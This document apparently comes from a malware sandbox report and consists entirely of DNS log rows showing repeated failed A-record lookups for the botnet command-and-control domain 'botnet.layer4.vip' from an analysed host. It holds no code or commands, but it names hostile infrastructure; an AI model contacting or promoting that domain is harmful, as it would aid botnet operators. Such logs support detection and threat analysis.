                                  Apr 9, 2023 03:31:03.064271927 CEST8.8.8.8192.168.2.230xefd6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.080226898 CEST8.8.8.8192.168.2.230xefd6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.104403019 CEST8.8.8.8192.168.2.230xefd6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.128647089 CEST8.8.8.8192.168.2.230xefd6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.144318104 CEST8.8.8.8192.168.2.230xefd6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.169023037 CEST8.8.8.8192.168.2.230x3b2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.184751987 CEST8.8.8.8192.168.2.230x3b2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.209026098 CEST8.8.8.8192.168.2.230x3b2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.233342886 CEST8.8.8.8192.168.2.230x3b2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.257848024 CEST8.8.8.8192.168.2.230x3b2eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.275718927 CEST8.8.8.8192.168.2.230x77ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.291630030 CEST8.8.8.8192.168.2.230x77ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.315766096 CEST8.8.8.8192.168.2.230x77ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.340112925 CEST8.8.8.8192.168.2.230x77ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.364645004 CEST8.8.8.8192.168.2.230x77ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.380357981 CEST8.8.8.8192.168.2.230x2cd7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.395991087 CEST8.8.8.8192.168.2.230x2cd7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.420475006 CEST8.8.8.8192.168.2.230x2cd7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.436144114 CEST8.8.8.8192.168.2.230x2cd7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.460304976 CEST8.8.8.8192.168.2.230x2cd7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.485002041 CEST8.8.8.8192.168.2.230x9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.509443998 CEST8.8.8.8192.168.2.230x9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.525382042 CEST8.8.8.8192.168.2.230x9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.549767017 CEST8.8.8.8192.168.2.230x9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.574330091 CEST8.8.8.8192.168.2.230x9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.590523005 CEST8.8.8.8192.168.2.230xbb80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.606354952 CEST8.8.8.8192.168.2.230xbb80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.622034073 CEST8.8.8.8192.168.2.230xbb80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.646270037 CEST8.8.8.8192.168.2.230xbb80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.670810938 CEST8.8.8.8192.168.2.230xbb80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.686974049 CEST8.8.8.8192.168.2.230x30beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.711631060 CEST8.8.8.8192.168.2.230x30beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.727484941 CEST8.8.8.8192.168.2.230x30beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.751859903 CEST8.8.8.8192.168.2.230x30beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.776465893 CEST8.8.8.8192.168.2.230x30beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.792593002 CEST8.8.8.8192.168.2.230xc2cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.808280945 CEST8.8.8.8192.168.2.230xc2cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.824220896 CEST8.8.8.8192.168.2.230xc2cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.848453045 CEST8.8.8.8192.168.2.230xc2cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.873095036 CEST8.8.8.8192.168.2.230xc2cfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.889018059 CEST8.8.8.8192.168.2.230xa140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.913557053 CEST8.8.8.8192.168.2.230xa140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.929279089 CEST8.8.8.8192.168.2.230xa140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.953589916 CEST8.8.8.8192.168.2.230xa140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.978213072 CEST8.8.8.8192.168.2.230xa140Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.002933979 CEST8.8.8.8192.168.2.230xe360Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.018770933 CEST8.8.8.8192.168.2.230xe360Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.034802914 CEST8.8.8.8192.168.2.230xe360Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.059068918 CEST8.8.8.8192.168.2.230xe360Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.083420992 CEST8.8.8.8192.168.2.230xe360Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.107734919 CEST8.8.8.8192.168.2.230xb412Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.123704910 CEST8.8.8.8192.168.2.230xb412Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.147984028 CEST8.8.8.8192.168.2.230xb412Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.163688898 CEST8.8.8.8192.168.2.230xb412Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.180160046 CEST8.8.8.8192.168.2.230xb412Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.195837975 CEST8.8.8.8192.168.2.230xd684Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.220206976 CEST8.8.8.8192.168.2.230xd684Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.244538069 CEST8.8.8.8192.168.2.230xd684Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.260318995 CEST8.8.8.8192.168.2.230xd684Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.276273966 CEST8.8.8.8192.168.2.230xd684Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.300553083 CEST8.8.8.8192.168.2.230x1cc0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.316096067 CEST8.8.8.8192.168.2.230x1cc0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.340445042 CEST8.8.8.8192.168.2.230x1cc0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.356389046 CEST8.8.8.8192.168.2.230x1cc0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.380572081 CEST8.8.8.8192.168.2.230x1cc0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.396536112 CEST8.8.8.8192.168.2.230x2d26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.412255049 CEST8.8.8.8192.168.2.230x2d26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.436496019 CEST8.8.8.8192.168.2.230x2d26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.452239990 CEST8.8.8.8192.168.2.230x2d26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.467940092 CEST8.8.8.8192.168.2.230x2d26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.484301090 CEST8.8.8.8192.168.2.230x12fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.508578062 CEST8.8.8.8192.168.2.230x12fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.533054113 CEST8.8.8.8192.168.2.230x12fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.557156086 CEST8.8.8.8192.168.2.230x12fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.573302984 CEST8.8.8.8192.168.2.230x12fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.589024067 CEST8.8.8.8192.168.2.230xaa75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.605060101 CEST8.8.8.8192.168.2.230xaa75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.620763063 CEST8.8.8.8192.168.2.230xaa75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.645273924 CEST8.8.8.8192.168.2.230xaa75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.669953108 CEST8.8.8.8192.168.2.230xaa75Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.694617033 CEST8.8.8.8192.168.2.230xf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.719269991 CEST8.8.8.8192.168.2.230xf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.735496044 CEST8.8.8.8192.168.2.230xf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.751666069 CEST8.8.8.8192.168.2.230xf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.767769098 CEST8.8.8.8192.168.2.230xf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.785872936 CEST8.8.8.8192.168.2.230x65f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.810870886 CEST8.8.8.8192.168.2.230x65f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.827040911 CEST8.8.8.8192.168.2.230x65f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.851675987 CEST8.8.8.8192.168.2.230x65f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.876148939 CEST8.8.8.8192.168.2.230x65f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.892121077 CEST8.8.8.8192.168.2.230xc709Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.907939911 CEST8.8.8.8192.168.2.230xc709Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.923666954 CEST8.8.8.8192.168.2.230xc709Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.955102921 CEST8.8.8.8192.168.2.230xc709Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.971066952 CEST8.8.8.8192.168.2.230x40ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.995692015 CEST8.8.8.8192.168.2.230x40ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.012048960 CEST8.8.8.8192.168.2.230x40ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.036319017 CEST8.8.8.8192.168.2.230x40ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.052362919 CEST8.8.8.8192.168.2.230x40ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.077058077 CEST8.8.8.8192.168.2.230x3bb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.092849970 CEST8.8.8.8192.168.2.230x3bb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.117465973 CEST8.8.8.8192.168.2.230x3bb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.133563995 CEST8.8.8.8192.168.2.230x3bb0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.175621986 CEST8.8.8.8192.168.2.230x1e42Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.191570997 CEST8.8.8.8192.168.2.230x1e42Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.208153963 CEST8.8.8.8192.168.2.230x1e42Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.224215984 CEST8.8.8.8192.168.2.230x1e42Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.248764038 CEST8.8.8.8192.168.2.230x1e42Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.264703035 CEST8.8.8.8192.168.2.230x93dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.289566994 CEST8.8.8.8192.168.2.230x93dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.314171076 CEST8.8.8.8192.168.2.230x93dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.339423895 CEST8.8.8.8192.168.2.230x93dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.388350964 CEST8.8.8.8192.168.2.230x57c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.404437065 CEST8.8.8.8192.168.2.230x57c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.428726912 CEST8.8.8.8192.168.2.230x57c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.444710970 CEST8.8.8.8192.168.2.230x57c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.469263077 CEST8.8.8.8192.168.2.230x57c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.493525982 CEST8.8.8.8192.168.2.230xd5e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.509155989 CEST8.8.8.8192.168.2.230xd5e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.533737898 CEST8.8.8.8192.168.2.230xd5e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.558377028 CEST8.8.8.8192.168.2.230xd5e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.589770079 CEST8.8.8.8192.168.2.230xd8adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.613890886 CEST8.8.8.8192.168.2.230xd8adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.630098104 CEST8.8.8.8192.168.2.230xd8adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.645845890 CEST8.8.8.8192.168.2.230xd8adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.670435905 CEST8.8.8.8192.168.2.230xd8adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.686486959 CEST8.8.8.8192.168.2.230x7fecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.710799932 CEST8.8.8.8192.168.2.230x7fecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.775429010 CEST8.8.8.8192.168.2.230x7fecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.815545082 CEST8.8.8.8192.168.2.230x3a07Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.831578970 CEST8.8.8.8192.168.2.230x3a07Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.847224951 CEST8.8.8.8192.168.2.230x3a07Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.871932983 CEST8.8.8.8192.168.2.230x3a07Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.887998104 CEST8.8.8.8192.168.2.230xecfaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.903672934 CEST8.8.8.8192.168.2.230xecfaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.943819046 CEST8.8.8.8192.168.2.230xecfaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.967982054 CEST8.8.8.8192.168.2.230xecfaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.032121897 CEST8.8.8.8192.168.2.230x9317Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.145776987 CEST8.8.8.8192.168.2.230xcf40Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.177995920 CEST8.8.8.8192.168.2.230xcf40Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.193990946 CEST8.8.8.8192.168.2.230x1e8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.218856096 CEST8.8.8.8192.168.2.230x1e8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.243205070 CEST8.8.8.8192.168.2.230x1e8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.268001080 CEST8.8.8.8192.168.2.230x1e8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.315659046 CEST8.8.8.8192.168.2.230xf02dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.340008974 CEST8.8.8.8192.168.2.230xf02dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.388752937 CEST8.8.8.8192.168.2.230xf02dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.429395914 CEST8.8.8.8192.168.2.230xbdf4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.453641891 CEST8.8.8.8192.168.2.230xbdf4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.469590902 CEST8.8.8.8192.168.2.230xbdf4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.633275986 CEST8.8.8.8192.168.2.230xc1fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.674619913 CEST8.8.8.8192.168.2.230xc1fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.690825939 CEST8.8.8.8192.168.2.230xc1fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.715102911 CEST8.8.8.8192.168.2.230xc1fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.814362049 CEST8.8.8.8192.168.2.230x949Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.839181900 CEST8.8.8.8192.168.2.230x949Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.882868052 CEST8.8.8.8192.168.2.230x1660Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.907092094 CEST8.8.8.8192.168.2.230x1660Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.940009117 CEST8.8.8.8192.168.2.230x1660Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.972309113 CEST8.8.8.8192.168.2.230x4d8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.987997055 CEST8.8.8.8192.168.2.230x4d8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.012747049 CEST8.8.8.8192.168.2.230x4d8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.093234062 CEST8.8.8.8192.168.2.230x77edName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.180533886 CEST8.8.8.8192.168.2.230xa2c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.196176052 CEST8.8.8.8192.168.2.230xa2c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.211752892 CEST8.8.8.8192.168.2.230xa2c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.227833986 CEST8.8.8.8192.168.2.230x889bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.276385069 CEST8.8.8.8192.168.2.230x889bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.300853968 CEST8.8.8.8192.168.2.230x889bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.341366053 CEST8.8.8.8192.168.2.230xd2b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.381194115 CEST8.8.8.8192.168.2.230xd2b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.396797895 CEST8.8.8.8192.168.2.230xd2b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.467878103 CEST8.8.8.8192.168.2.230xe4e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.483813047 CEST8.8.8.8192.168.2.230xe4e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.499303102 CEST8.8.8.8192.168.2.230xe4e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.515187025 CEST8.8.8.8192.168.2.230xa6a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.530989885 CEST8.8.8.8192.168.2.230xa6a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.587018967 CEST8.8.8.8192.168.2.230xa6a3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.627295017 CEST8.8.8.8192.168.2.230xc40cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.674520016 CEST8.8.8.8192.168.2.230xc40cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.698812008 CEST8.8.8.8192.168.2.230xfc87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.778218031 CEST8.8.8.8192.168.2.230xfc87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.795118093 CEST8.8.8.8192.168.2.230xfc87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.820543051 CEST8.8.8.8192.168.2.230x1b12Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.844692945 CEST8.8.8.8192.168.2.230x1b12Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.860348940 CEST8.8.8.8192.168.2.230x1b12Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
